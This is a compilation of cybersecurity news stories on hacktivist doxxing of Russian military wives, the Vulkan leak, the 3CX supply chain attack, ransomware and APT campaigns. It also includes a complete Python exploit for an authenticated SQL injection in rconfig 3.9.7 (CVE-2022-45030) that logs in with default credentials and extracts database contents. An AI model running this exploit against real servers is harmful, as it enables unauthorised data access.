By Waqas
Ukrainian hacktivists extracted personal information, including sensitive military data and even nude photos of one of the targeted military wives.
This is a post from HackRead.com Read the original post: Ukrainian Hacktivists Trick Russian Military Wives for Personal Info

The hacktivists convinced the wife of a serving colonel in the Russian military to participate in a patriotic photoshoot. She then convinced 12 more military wives to join, which allowed the hacktivists to extract personal and sensitive information.

Ukrainian hacktivists group Cyber Resistance aka the Ukrainian Cyber Alliance reportedly came up with a unique strategy to hack into their targeted Russian military personnel’s email accounts.

The hacktivists extracted information on Colonel Sergey Valeriyevich Artoshchenko by tricking his wife into doing a patriotic photoshoot. For your information, Artoshchenko is commissioned at an aviation unit (960th Assault Aviation Regiment) in Crimea.

In 2018, Russian hackers were reportedly accused of posing as ISIS and sending death threats to US army wives. When it comes to posing as someone else, this incident bears some similarities to the recent hack by Ukrainian hacktivists.

**Cyber Resistance and InforNapalm**

InfoNapalm was created in 2014, and Cyber Resistance in 2016 in response to the Russian annexation of Crimea. These groups have been spreading information about the disputes between Russia and Ukraine over the years. After the Russian invasion of Ukraine in February 2022, their efforts to sabotage the Russian military have doubled.

**How Cyber Resistance Exploited Russian Military Wives?**

Cyber Resistance hacktivists targeted the colonel for his reported involvement in the bombing of a civilian-packed theatre in Mariupol in March 2022.

The hacktivists convinced his wife for a photoshoot wearing her husband’s uniform jacket under the pretext that the photos will be featured on a pinup calendar to increase the Russian military’s morale.

Mrs. Artoshchenko was contacted by one of the hackers posing as an officer from her husband’s regiment. She contacted 12 other military wives to participate in this photoshoot.

The unsuspecting army wives took photos wearing the uniforms of their husbands. The photos provided Ukrainian hackers with enough information to track down the personal details of their husbands, mainly Col. Artoshchenko. The other officers were also involved in the attack. 

Cyber Resistance hacktivists collaborated with a Pro-Ukrainian open-source intelligence group, InfoNapalm, to publish the data on its Telegram channel.

**How Do Hackers Locate Officers?**

The hacktivists obtained sufficient professional data from the target’s uniform and used his COVID-19 vaccination records to locate his current home, duty station, and other details. They hacked into the Russian Ministry of Defence website portal to hack email and get details on his salary.

In addition, they got almost all key personal details, such as the colonel’s date of birth, address, and phone numbers. The data is available on the InfoNapalm website. Hackers even managed to locate and publish his photo and images of his official documents and residence.

Moreover, they didn’t spare his wife as they hacked and shared her private data, including her phone number, passport number, birth date, and email ID to the InfoNapalm website. Hackers also found near-nude and nude photos of Mrs. Artoshchenko, two of which were published by InfoNapalm.

“Among the large volumes of correspondence and spam in the mail dumps of the 960th AAR commander, Col. Sergey Atroshchenko, we managed to find and isolate various detailed lists of pilots, performance evaluation records of officers, bulletins, memos, theoretical and practical calculations, etc. which are of material interest for the Ukrainian intelligence,” InfoNapalm revealed in its report.

The news outlet said it would not post the full data dump for public viewing because they want Russians to keep speculating about the scope of the leak. The platform thanked their “hacktivists friends from Cyber Resistance” for providing an opportunity to post this “exciting story” for the public.

1.  Hackers used seductive female images to hack IDF phones
2.  Hackers posed as women to install malware on IDF’s devices
3.  Hackers use fake female Facebook profiles for Android spyware
4.  Hackers use female avatars to steal data from Syrian opposition
5.  Hackers breach Israeli military servers using IDF women’s photos

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

Ukrainian Hacktivists Trick Russian Military Wives for Personal Info

Plus: A major new supply chain attack, Biden’s spyware executive order, and a hacking campaign against Exxon’s critics.

Did you hear that Donald Trump got indicted this week? Of course you did. Ridiculous question. The first-ever indictment of a former US president had been looming for weeks. And now that it's happened, the move by a Manhattan grand jury is deepening fissures in America's already-fraught political divide. But while Trump headlines flood your feeds, there were plenty of other big stories this week, none of which have anything to do with any of _that_. 

In Germany, police are cracking down on people who post adult content to websites and platforms that lack age-verification checks, like Twitter. This has resulted in fines and threats of jail time, while some performers are deleting their accounts—or fleeing the country. This is just one of the impacts of a wave of age-verification laws sweeping the global internet.

Meanwhile, in darker corners of the internet, North Korea–backed hackers are using a rare technique to launder their stolen cryptocurrencies: paying to mine clean crypto with loot taken from their victims. The tactic is meant to throw blockchain detectives off the trail of swiped funds. Speaking of ill-gotten gains, Costa Rica is still reeling from a series of ransomware attacks last spring that left swaths of the country's infrastructure devastated. As a result, the US government is sending $25 million in aid to help it recover. 

Most victims of cyberattacks don't get help from the US government, however. Fortunately for them, this week Microsoft announced its new system, Security Copilot, which integrates OpenAI's ChatGPT and home-grown artificial intelligence to help incident responders managed breaches. Of course, the best way to protect yourself from getting hacked is to make sure all your systems are fully patched and up to date.

To top it all off, this week we revealed new documents obtained through a public records request which show that Good Smile, a major toy company that creates figurines for companies like Disney, invested $2.4 million in the toxic imageboard 4chan, helping to keep the company online.

But that's not all. Each week, we dive into the stories we weren't able to report on ourselves. Click on the headlines to read the full stories. And stay safe out there.

The Russian government and military remain the most aggressive in the world when it comes to disruptive acts of cyber-sabotage against civilian infrastructure. But documents leaked by a whistleblower inside a Russian intelligence contractor seem to reveal some new and alarming pages of the Kremlin’s hybrid war playbook.

A consortium of investigative journalists at 11 news outlets including Paper Trail Media, _The Guardian_, and _The Washington Post_ obtained a leak of secret documents from a Russian cybersecurity contractor firm called Vulkan, the Russian word for _volcano_. The documents, which were also analyzed by cybersecurity firm Mandiant, reveal that Vulkan sold software tools to Russian intelligence agencies like the KGB-successor FSB and the GRU military intelligence agency, including its notorious cyberattack-focused team known as Sandworm. 

The tools include one piece of software for scanning the internet for security vulnerabilities and another that seemed designed to organize disinformation campaigns and coordinate offensive hacking operations. Perhaps most disturbing of all was a proposal for a third tool that appeared to be designed to allow hackers to train in simulated networks of infrastructure systems like railways and pipelines, with specific references to methods to sabotage those systems with catastrophic effects. But it’s not clear whether that last tool was ever built, and if so, whether it was used primarily for offensive hacking or “red team” defensive training, or whether it led to the development of any actual hacking capabilities targeting critical infrastructure.

Security experts say North Korea–linked hackers have successfully carried out a supply chain attack through compromised versions of 3CX, a video and voice communications platform used by high-profile companies including American Express and Mercedes-Benz. 3CX says it has more than 600,000 customers. The hackers were able to install malware within the Mac and Windows versions of 3CX, which were signed with the company's keys, thus allowing the Trojanized apps to go undetected. The attack is being compared to Russian hackers' SolarWinds supply chain attack, which wrought havoc around the world for months. 

As hacker-for-hire firms' tools proliferate to governments around the world, the Biden administration has made clear: The US will not be one of that industry's customers. A new executive order bans US agencies from buying access to that commercial spyware, a key step in a growing effort to curb companies like NSO Group, Cytrox, and Candiru, which have enabled surveillance and human rights abuses from Spain to Mexico to Saudi Arabia. US agencies haven't been confirmed to be past customers of any of those companies, though the FBI did at one point test NSO's Phantom spyware before ultimately walking away from a deal with the company. But the order nonetheless sets a precedent for governments worldwide, assuring that US taxpayer funds won't flow to a dangerous industry whose tools have offered intrusive hacking techniques to repressive regimes targeting activists, journalists, and human rights defenders.

While we're on the subject of dangerous hacker-for-hire firms targeting vulnerable activists: The _Wall Street Journal_ reported this week that Indian hacker-for-hire firm BellTroX targeted climate change activists campaigning against Exxon, including Greenpeace, Public Citizen, 350.org, and the Rockefeller Family Fund. The firm was hired by Israeli private detective Aviram Azari, who has since pleaded guilty to hacking conspiracy charges. Exactly who hired Azari remains unclear, and Exxon denies having any connection to Azari or the hacking campaign. The hackers successfully accessed email accounts for Greenpeace, Public Citizen, and 350.org, but it's not yet clear whether they successfully penetrated the Rockefeller Family Fund, an organization created by Rockefeller heirs that has worked to combat the oil industry's efforts to lobby against climate change solutions.

‘Vulkan’ Leak Offers a Peek at Russia’s Cyberwar Playbook

By Habiba Rashid
Italy has given OpenAI, the parent company of ChatGPT, a deadline of 20 days to sort out privacy issues, including data collection, under Europe's General Data Protection Regulation (GDPR).
This is a post from HackRead.com Read the original post: Italy Temporarily Blocks ChatGPT, Citing Privacy Issues

The ChatGPT ban comes just days after OpenAI acknowledged privacy breaches in which private conversation histories of free users and payment data of ChatGPT Plus were exposed.

Artificial intelligence (AI) technology is rapidly becoming an integral part of our daily lives. From personal assistants to chatbots, AI technology is constantly evolving and changing the way we interact with the world around us.

One such AI chatbot that has been making waves in recent years is ChatGPT. However, Italy’s data protection agency has recently announced a temporary block on ChatGPT within the country’s borders, citing insufficient safeguards for user data and a lack of measures to prevent minors from using its generative AI service. Italy has also launched an investigation into the matter.

OpenAI, the parent company of ChatGPT, has a deadline of 20 days to comply with the order under the General Data Protection Regulation (GDPR) of Europe. Failure to do so could result in fines amounting to 4 percent of global revenue or €20 million, whichever is higher.

Italy’s complaints against ChatGPT are difficult to argue with. OpenAI recently experienced a glitch that exposed the private conversation history titles of its users. Later on, the company admitted that the breach was more significant than it had initially estimated, revealing that the payment card data of ChatGPT Plus subscribers had also been exposed.

There is also a complete lack of gatekeeping for minors, which is a significant concern. Another significant issue with ChatGPT and other AI chatbots like it is the issue of “training” the AI itself.

ChatGPT and other AI chatbots learn to mimic human behaviour by analyzing online content without the permission of the people who wrote it. ChatGPT can provide personal information about individuals but often makes mistakes, and those individuals have no way to correct these inaccuracies.

The ban on ChatGPT in Italy highlights the growing concerns about data privacy and the role of AI in our lives. Policymakers across the world are grappling with how to respond to the rise of AI products and the enormous amounts of data they consume from tens of millions of users worldwide. The move by Italy’s data protection agency could be the first of many regulatory actions against popular chatbots and AI services.

OpenAI has stated that it is committed to protecting people’s privacy and believes it complies with GDPR and other privacy laws. However, the temporary block on ChatGPT in Italy highlights the need for stronger data protection measures and the importance of ensuring that AI services are held accountable for their actions.

As the use of AI technology continues to grow, it is crucial that we continue to monitor and regulate these services to ensure that they are used ethically and responsibly.

1.  Russia Bans WhatsApp, Discord, Telegram, and Others
2.  Data collected in gaming can be used for privacy breach
3.  Lithuania to citizens: Dump Chinese phones over privacy

I’m a student and cybersecurity writer. On a random Sunday, I am likely to be figuring out life and reading Kafka.

Italy Temporarily Blocks ChatGPT, Citing Privacy Issues

The State of Email Security Report reveals cyber risk commands the C-suite's focus.

**DUBAI****, UAE****,** **March 31, 2023** **/PRNewswire/ --** Mimecast, an advanced email and collaboration security company, today announced the publication of its annual "The State of Email Security 2023" (SOES) report. The global survey is based on responses from 1,700 IT and security decision-makers, providing readers with key takeaways on the current threat landscape and offering recommendations to help organizations improve their cybersecurity posture.

Download the full report – Mimecast's "The State of Email Security 2023"

The global report sheds light on the threats affecting companies across the globe, including the United Arab Emiratesand Saudi Arabia. Ninety four of respondents from the UAE and 100% from Saudi Arabia  reported to have been targeted by emailed-based phishing attacks in the last year, but they all said that they either have a system to monitor and protect against email-borne threats or are actively planning to roll one out.

**Highlights From This Year's Report** 

**Cyber awareness in the C-suite –** As cyberattacks continue to become more sophisticated, business leaders in the region have shown greater willingness to confront the risks involved and invest in proper measures to keep cyberattacks at bay. On average, 95% of companies in the UAE and Saudi Arabia reported needing stronger protection for their Microsoft 365 and Google Workspace applications, while 61% said their company needs to spend more on cybersecurity. However, all companies reported some form of cyber awareness training at their workplace, thus indicating a greater alertness to future attacks. With the increased focus on cyber preparedness by the C-suite, CISOs feel more empowered to articulate their requirements and implement strategies and tactics that will make their organization more secure.  

**Collaboration tools, essential but risky –** With workforces still divided between the office and remote locations, collaboration tools remain an essential yet risky part of communicating with team members. Eighty four percent of SOES participants in UAE and as many as 94% in Saudi Arabia agree that collaboration tools like Microsoft Teams or Slack are essential to their working function, but 82% from both countries expect to be harmed in 2023 by a collaboration-tool-based attack. The sharp increase in the use of these tools puts it directly in the minds of CISOs to ensure that adequate security measures are put in place for them to continue working protected while using them.

**Improved cyber preparedness –** There is a growing realization that cyber risk isn't just an IT problem — it's a critical vulnerability that directly equates to overall business risk. As such, organizations are taking the necessary measures to prepare for impending attacks.   Half are using artificial intelligence and machine learning to help under-resourced teams stay ahead of the curve, while the other half have plans to implement such measures. The use of AI tools will undoubtedly help under-resourced cybersecurity teams stay ahead of attacks and manage threats accordingly. Sixty four percent of Saudi Arabian respondents cited threat prevention as the top benefit of implementing AI, while 54% of organisations in UAE said reduced human error across the company was the biggest advantage. Overall, most companies believe that AI systems will help revolutionize the ways in which cybersecurity is practiced.

"Supply chain vulnerabilities, the rise of online collaboration and the growth of digital networking are among the chief reasons the cyber landscape is becoming more treacherous. The intersection of communications, people, and data carries a tremendous amount of risk, as malicious actors exploit the interconnectedness of the modern work surface," says Werno Gevers, regional leader of Mimecast Middle East. "Our research shows that corporate boards have finally woken up to the realisation that cyber risk is business risk, so it's time for CISOs to make the case for increased budgets and greater cyber resiliency."

Download the full report and view the UAE and Saudi Arabia infographics to learn more, and stay tuned to the Mimecast blog Cyber Resilience Insights_._

**Mimecast: Work Protected™**  

Since 2003, Mimecast has stopped bad things from happening to good organizations by enabling them to work protected. We empower more than 40,000 customers to help mitigate risk and manage complexities across a threat landscape driven by malicious cyberattacks, human error, and technology fallibility. Our advanced solutions provide the proactive threat detection, brand protection, awareness training, and data retention capabilities that evolving workplaces need today. Mimecast solutions are designed to transform email and collaboration security into the eyes and ears of organizations worldwide.  

_Mimecast, the Mimecast logo, and Work Protected are either registered trademarks or trademarks of Mimecast Services Limited in_ the United States _and/or other countries.  All rights reserved.  All other third-party trademarks and logos contained in this press release are the property of their respective owners._

SOURCE Mimecast

Mimecast Report Reveals Nearly 60% of Companies in UAE and Saudi Arabia Need to Increase Cybersecurity Spending

"Anonymous Sudan" has been claiming that its DDoS attacks are in retaliation for anti-Islamic activities, but at least one security vendor is suspicious about its true motives.

An apparently pro-Islamic group that has hit numerous targets in Europe with distributed denial of service (DDoS) attacks over the past few months may actually be a subgroup of the Russian hacktivist collective known as Killnet.

The group, which calls itself "Anonymous Sudan," has claimed responsibility for recent DDoS attacks against targets in France, Germany, the Netherlands, and Sweden. All the attacks were apparently in retaliation for perceived anti-Islamic activity in each of these countries. The attacks on Swedish government and business entities, for instance, followed an incident of Quran-burning in Stockholm. The same, or similar, reason was the trigger for DDoS attacks against Dutch government agencies and an attack on Air France, where the group — in a break from character — stole data from the airline's website rather than DDoSing it.

**Anonymous Sudan's Killnet Links**

Researchers from Trustwave, who have been tracking Anonymous Sudan for the past several months, this week said there is some evidence to suggest the group is a front for Killnet. In a report, Trustwave said its researchers have not been able to confirm if Anonymous Sudan is, in fact, based in Sudan or if any of its members are from that country. The group's Telegram posts are in Russian and English, and other telemetry instead point to at least some of its members being Eastern European.

Just as with Killnet, all of Anonymous Sudan's targets have been in countries that have opposed Russia's invasion of Ukraine and/or have assisted the latter in some way. It's most recent threat — on March 24 — to attack targets in Australia fits into the same patterns, as does a DDoS attack against Israeli cybersecurity vendor Radware.

Also just like Killnet, Anonymous Sudan has mostly employed DDoS attacks to send its message to intended targets. And both Killnet and Anonymous Sudan have made claims on their respective Telegram channels that officially connect to each other. In January for instance, Anonymous Sudan claimed to have assisted Killnet in a DDoS attack against Germany's Federal Intelligence Service, Trustwave said.

Just why Anonymous Sudan would brand itself as a pro-Islamic group rather than a pro-Russian group allied with — or possibly a part of — Killnet remains unclear, according to Trustwave researchers. "Anonymous Sudan has been extremely active taking credit for attacks via its Telegram channel, but details concerning the true reasoning behind its efforts remain murky."

**A Noisy Hacktivist Collective**

Killnet itself is a noisy hacktivist group, that, in the months since Russia's invasion of Ukraine, has hit, or claimed to hit, numerous organizations worldwide in DDoS attacks. The group has described the attacks as retaliation against the US-led support for Ukraine in the war — and indeed, all of its victims have been in countries that have rallied behind Ukraine. Most of its attacks so far have been on organizations in Europe. But in February, Killnet launched DDoS attacks against more than one dozen major US hospitals, including Stanford Health, Michigan Medicine, Duke Health, and Cedar-Sinai. Last October, the group launched DDoS attacks against multiple US airports, including Los Angeles International Airport (LAX), Chicago O'Hare, and the Hartsfield-Jackson Atlanta International Airport.

Killnet has touted these attacks as major incidents. But security experts, and victim organizations themselves, have characterized the group as a medium severity threat at worst, but one that however cannot be ignored. Following Killnet's attacks on US hospitals, for instance, the American Health Association (AHA) described Killnet's attacks as typically not causing much damage but on occasion having the potential to disrupt services for several days.

Trustwave SpiderLabs security researcher Jeannette Dickens-Hale characterizes the threat that Anonymous Sudan presents the same way. 

"Based on Anonymous Sudan's recent DDoS attacks, its connection to, and similarity in tactics techniques, and procedures (TTPs) to Killnet, it appears that the group has a low to medium sophistication level," she says. "Killnet, conveniently just like Anonymous Sudan, mainly launches DDoS attacks and threatens extortion with data they may or may not have." 

Trustwave SpiderLabs assesses that Killnet has the same threat level. Anonymous Sudan's recent attack against Air France and the threat to sell its data — that it may or may not actually have — could indicate an escalation in motivation and attack type, Dickens-Hale says.

**Killnet's "Black Skills" Launch**

Killnet's incessant attempts to drum up support for its efforts — mostly through exaggerated claims of its successes — are another thing that researchers are keeping an eye on. Flashpoint this week, for instance, reported observing Killnet's leader "Killmilk" announcing the creation of a private military hacking outfit called "Black Skills".

The security vendor assessed that Killmilk's description of Black Skills was an attempt to position Killnet as the cyber equivalent of Russian mercenary operation the Wagner Group. Earlier in March, Killnet also announced a DDoS-as-a-service offering called "Black Listing" that Flashpoint perceived as another attempt by the collective to carve a more formal identity for itself. 

"Black Skills/Black Listing appear to be an attempt from Killnet to establish itself as a corporate identity," Flashpoint researchers concluded. "According to our intelligence, the new group will be organized and structured, with subgroups taking care of payroll, public relations and technical support, pen testing, as well as data collection, analysis, information operations, and hits against priority targets."

Pro-Islam 'Anonymous Sudan' Hacktivists Likely a Front for Russia's Killnet Operation

By Waqas
For now, Cylance ransomware is still in its early stages, yet it has already claimed several victims.
This is a post from HackRead.com Read the original post: New Cylance Ransomware Targets Linux and Windows, Warn Researchers

Do not confuse Cylance Ransomware with the Blackberry-owned Cylance cybersecurity company.

The cybersecurity researchers at Palo Alto Networks Unit 42 have discovered a new strain of Cylance Ransomware, which has already claimed several victims. Researchers noticed it early Friday morning, and further probing revealed that it is targeting Linux and Windows devices.

As of now, insufficient information is available about Cylance Ransomware, indicating that it is a relatively recent emergence. The ransom note received by victims was published by Unit 42 which contains the attackers’ email addresses, but surprisingly not the ransom amount. Here is the content of the ransom note:

“All your files are encrypted, and currently unusable, but you need to follow our instructions. Otherwise, you can’t return your data (never. It’s just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities – nobody will cooperate with us. It’s not in our interests.”

“To check the ability of returning files, we decrypt one file for free. That is our guarantee. If you will not cooperate with our service – for us, it does not matter. But you will lose time and data, cause just we have the private key. time is more valuable than money.”

It is believed that the amount will be disclosed to the victim when they contact the attacker. The attackers have warned against any attempt to restore or change the files, as it would destroy the private key, which means the data will be lost forever.

**Attack Methodology**

In a tweet, researchers explained that the modus operandi of the ransomware attack involves encrypting files and appending them with a “.Cylance” extension. In addition, a text file titled “Read Me” is added to all encrypted files’ folders. This file contains the attacker’s ransom note.

**Who is Distributing Cylance Ransomware?**

For your information, Cylance is actually a cybersecurity company owned by BlackBerry Ltd. The company is known for mitigating and preventing ransomware attacks on enterprise organizations. However, why threat actors named the ransomware after this company is unclear, or it could be that they are looking for extra attention or to negatively impact Cylance in the long run.

Although Cylance ransomware is still in its early stages, it will be crucial to monitor its targets and wait for more information from the infosec community. Currently, samples of the ransomware are available on MalwareBazaar, a project by abuse.ch that shares malware samples with the infosec community, AV vendors, and threat intelligence providers.

1.  95.6% of Malware in 2022 Targeted Windows
2.  Lessons from Holy Ghost ransomware attacks
3.  CryWiper poses as ransomware to target Russia
4.  Royal Ransomware: New Threat Uses Google Ads
5.  Alert against AXLocker, Octocrypt, Alice ransomware

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

New Cylance Ransomware Targets Linux and Windows, Warn Researchers

Russian intelligence services, together with a Moscow-based IT company, are planning worldwide hacking operations that will also enable attacks on critical infrastructure facilities.

The release of thousands of pages of confidential documents has exposed Russian military and intelligence agencies' grand plans for using their cyberwar capabilities in disinformation campaigns, hacking operations, critical infrastructure disruption, and control of the Internet.

The papers were leaked from the Russian contractor NTC Vulkan and show how Russian intelligence agencies use private companies to plan and execute global hacking operations. They include project plans, software descriptions, instructions, internal emails, and transfer documents from the company.

The takeover of railroad networks and power plants are also part of a training seminar held by Vulkan to train hackers.

The leak also exposes the company's close links to the FSB, Russia's domestic spy agency, the GOU and GRU, the respective operational and intelligence divisions of the armed forces, and the SVR, Russia's foreign intelligence organization.

The documents, which were leaked by an unnamed source to a German reporter working for the Süddeutsche Zeitung at the start of Russia's invasion of Ukraine, have since been analyzed by global media outlets including The Washington Post and German media outlets Paper Trail Media and Der Spiegel.

According to the Spiegel report (in German), Vulkan has developed tools that allow state hackers to efficiently prepare cyberattacks, filter Internet traffic, and spread propaganda and disinformation on a massive scale.

The Spiegel report notes that analysts from Google reportedly discovered a connection between Vulkan and the hacker group Cozy Bear years ago; the group has successfully penetrated systems of the US Department of Defense in the past.

**Amezit, Skan-V Programs Revealed**

One offensive cyber program described in the documents is internally codenamed "Amezit."

The wide-ranging platform is designed to enable attacks on critical infrastructure facilities in addition to total information control over specific areas.

The program's goals include using special software to derail trains or paralyze airport computers, but it was not clear from the materials whether the program is currently being used against Ukraine.

Another project, called "Skan-V," is supposed to automate cyberattacks and make them much easier to plan.

Whether and where the programs were used cannot be traced, but the documents prove that the programs were ordered, tested, and paid for.

"People should know the dangers this poses," shared the anonymous source who leaked the docs to the media. The Russian invasion of Ukraine had motivated the source to make the documents public.

**As the Sandworm Turns**

A trail also leads to the state hacker group Sandworm, one of the most dangerous advanced persistent threats (APTs) in the world, responsible for some of the most serious cyberattacks of recent years. For instance, the threat actor has been targeting the Ukrainian capital since as far back as December 2016 when it used the malware tool Industroyer to cause a temporary power outage in Kyiv.

Until now, it was not known that the group used tools from private companies.

Sandworm has previously been linked to GRU.

Since the start of the war, at least five Russian, state-sponsored or cybercriminal groups — including Gamaredon, Sandworm, and Fancy Bear — have targeted Ukrainian government agencies and private companies in dozens of operations that aimed to disrupt services or steal sensitive information.

Vulkan Playbook Leak Exposes Russia's Plans for Worldwide Cyberwar

rconfig version 3.9.7 suffers from a remote SQL injection vulnerability.

    # Exploit Title: rconfig 3.9.7 - Sql Injection (Authenticated)# Exploit Author: azhen# Date: 10/12/2022# Vendor Homepage: https://www.rconfig.com/# Software Link: https://www.rconfig.com/# Vendor: rConfig# Version: <= v3.9.7# Tested against Server Host: Linux# CVE: CVE-2022-45030import requestsimport sysimport urllib3urllib3.disable_warnings()s = requests.Session()# sys.argv.append("192.168.10.150") #Enter the hostnameif len(sys.argv) != 2:    print("Usage: python3 rconfig_sqli_3.9.7.py <host>")    sys.exit(1)host=sys.argv[1] #Enter the hostnamedef get_data(host):    print("[+] Get db data...")    vul_url = "https://"+host+":443/lib/ajaxHandlers/ajaxCompareGetCmdDates.php?deviceId=-1&command='+union+select+concat(1000%2bord(substr({},{},1)),'-1-1')%20--%20"    query_exp = "database()"    result_data = ""    for i in range(1, 100):        burp0_headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:86.0) Gecko/20100101 Firefox/86.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate"}        res = requests.get(vul_url.format(query_exp, i), cookies=s.cookies,verify=False)        # print(res.text)        a = chr(int(res.text[6:10]) - 1000)        if a == '\x00':            break        result_data += a                print(result_data)        print("[+] Database name: {}".format(result_data))    '''    output:    [+] Logging in...    [+] Get db data...    r    rc    rco    rcon    rconf    rconfi    rconfig    rconfigd    rconfigdb    [+] Database name: rconfigdb            '''def login(host):    print("[+] Logging in...")    url = "https://"+host+":443/lib/crud/userprocess.php"    headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:86.0) Gecko/20100101 Firefox/86.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "https://demo.rconfig.com", "Connection": "close", "Referer": "https://demo.rconfig.com/login.php", "Upgrade-Insecure-Requests": "1"}        data = {"user": "admin", "pass": "admin", "sublogin": "1"} #Use valid set of credentials default is set to admin/admin    response=s.post(url, headers=headers, cookies=s.cookies, data=data, verify=False)    get_data(host)login(host)

rconfig 3.9.7 SQL Injection

The advanced persistent threat (APT) actor known as Winter Vivern is now targeting officials in Europe and the U.S. as part of an ongoing cyber espionage campaign.
"TA473 since at least February 2023 has continuously leveraged an unpatched Zimbra vulnerability in publicly facing webmail portals that allows them to gain access to the email mailboxes of government entities in Europe," Proofpoint

The advanced persistent threat (APT) actor known as **Winter Vivern** is now targeting officials in Europe and the U.S. as part of an ongoing cyber espionage campaign.

"TA473 since at least February 2023 has continuously leveraged an unpatched Zimbra vulnerability in publicly facing webmail portals that allows them to gain access to the email mailboxes of government entities in Europe," Proofpoint said in a new report.

The enterprise security firm is tracking the activity under its own moniker **TA473** (aka UAC-0114), describing it as an adversarial crew whose operations align with that of Russian and Belarussian geopolitical objectives.

What it lacks in sophistication, it makes up for in persistence. In recent months, the group has been linked to attacks targeting state authorities of Ukraine and Poland as well as government officials in India, Lithuania, Slovakia, and the Vatican.

The NATO-related intrusion wave entails the exploitation of CVE-2022-27926 (CVSS score: 6.1), a now-patched medium-severity security flaw in Zimbra Collaboration that could enable unauthenticated attackers to execute arbitrary JavaScript or HTML code.

This also involves employing scanning tools like Acunetix to identify unpatched webmail portals belonging to targeted organizations with the goal of sending phishing email under the guise of benign government agencies.

The messages come with booby-trapped URLs that exploit the cross-site scripting (XSS) flaw in Zimbra to execute custom Base64-encoded JavaScript payloads within the victims' webmail portals to exfiltrate usernames, passwords, and access tokens.

It's worth noting that each JavaScript payload is tailored to the targeted webmail portal, indicating that the threat actor is willing to invest time and resources to reduce the likelihood of detection.

"TA473's persistent approach to vulnerability scanning and exploitation of unpatched vulnerabilities impacting publicly facing webmail portals is a key factor in this actor's success," Proofpoint said.

"The group's focus on sustained reconnaissance and painstaking study of publicly exposed webmail portals to reverse engineer JavaScript capable of stealing usernames, passwords, and CSRF tokens demonstrates its investment in compromising specific targets."

The findings come amid revelations that at least three Russian intelligence agencies, including FSB, GRU (linked to Sandworm), and SVR (linked to APT29), likely use software and hacking tools developed by a Moscow-based IT contractor named NTC Vulkan.

THN WEBINAR

Become an Incident Response Pro!

Unlock the secrets to bulletproof incident response – Master the 6-Phase process with Asaf Perlman, Cynet's IR Leader!

Don't Miss Out – Save Your Seat!

This includes frameworks like Scan (to facilitate large-scale data collection), Amesit (to conduct information operations and manipulate public opinion), and Krystal-2B (to simulate coordinated IO/OT attacks against rail and pipeline control systems).

"Krystal-2B is a training platform that simulates OT attacks against different types of OT environments in coordination with some IO components by leveraging Amesit 'for the purpose of disruption,'" Google-owned Mandiant said.

"The contracted projects from NTC Vulkan provide insight into the investment of Russian intelligence services into developing capabilities to deploy more efficient operations within the beginning of the attack lifecycle, a piece of operations often hidden from our view," the threat intelligence firm said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Winter Vivern APT Targets European Government Entities with Zimbra Vulnerability

Enterprise communications software maker 3CX on Thursday confirmed that multiple versions of its desktop app for Windows and macOS are affected by a supply chain attack.
The version numbers include 18.12.407 and 18.12.416 for Windows and 18.11.1213, 18.12.402, 18.12.407, and 18.12.416 for macOS.
The company said it's engaging the services of Google-owned Mandiant to review the incident. In the

Cyber Threat / Supply Chain Attack

Enterprise communications software maker 3CX on Thursday confirmed that multiple versions of its desktop app for Windows and macOS are affected by a supply chain attack.

The version numbers include **18.12.407 and 18.12.416** for Windows and **18.11.1213, 18.12.402, 18.12.407, and 18.12.416** for macOS.

The company said it's engaging the services of Google-owned Mandiant to review the incident. In the interim, it's urging its customers of self-hosted and on-premise versions of the software to update to version 18.12.422.

"3CX Hosted and StartUP users do not need to update their servers as we will be updating them over the night automatically," 3CX CEO Nick Galea said in a post on Thursday. "Servers will be restarted and the new Electron App MSI/DMG will be installed on the server."

Evidence available so far points to either a compromise of 3CX's software build pipeline to distribute Windows and macOS versions of the app package, or alternatively, the poisoning of an upstream dependency. The scale of the attack is currently unknown.

The earliest period of potentially malicious activity is said to have been detected on or around March 22, 2023, according to a post on the 3CX forum, although preparations for the campaign are said to have commenced no later than February 2022.

3CX said the initial alert flagging a potential security problem in its app last week was treated as a "false positive" owing to the fact that none of the antivirus engines on VirusTotal labeled it as suspicious or malware.

The Windows version of the attack leveraged a technique called DLL side-loading to load a rogue library referred to as "ffmpeg.dll" that's designed to read encrypted shellcode from another DLL called "d3dcompiler\_47.dll."

This involved accessing a GitHub repository to retrieve an ICO file containing URLs hosting the final-stage payload, an information stealer (dubbed ICONIC Stealer or SUDDENICON) capable of harvesting system information and sensitive data stored in web browsers.

"The choice of these two DLLs – ffmpeg and d3dcompiler\_47 – by the threat actors behind this attack was no accident," ReversingLabs security researcher Karlo Zanki said.

"The target in question, 3CXDesktopApp, is built on the Electron open source framework. Both of the libraries in question usually ship with the Electron runtime and, therefore, are unlikely to raise suspicion within customer environments."

SUDDENICON downloading a new executable

The macOS attack chain, in the same vein, bypassed Apple's notarization checks to download an unknown payload from a command-and-control (C2) server that's currently unresponsive.

"The macOS version does not use GitHub to retrieve its C2 server," Volexity said, which is tracking the activity under the cluster UTA0040. "Instead, a list of C2 servers is stored in the file encoded with a single byte XOR key, 0x7A."

THN WEBINAR

Become an Incident Response Pro!

Unlock the secrets to bulletproof incident response – Master the 6-Phase process with Asaf Perlman, Cynet's IR Leader!

Don't Miss Out – Save Your Seat!

Cybersecurity firm CrowdStrike, in an advisory of its own, has attributed the attack with high confidence to Labyrinth Chollima (aka Nickel Academy), a North Korea-aligned state-sponsored actor.

"The activity, which targets many organizations across a broad range of verticals without any obvious patterns, has been attributed to Labyrinth Chollima based on observed network infrastructure uniquely associated with that adversary, similar installation techniques, and a reused RC4 key," Adam Meyers, senior vice president of intelligence at CrowdStrike, told The Hacker News.

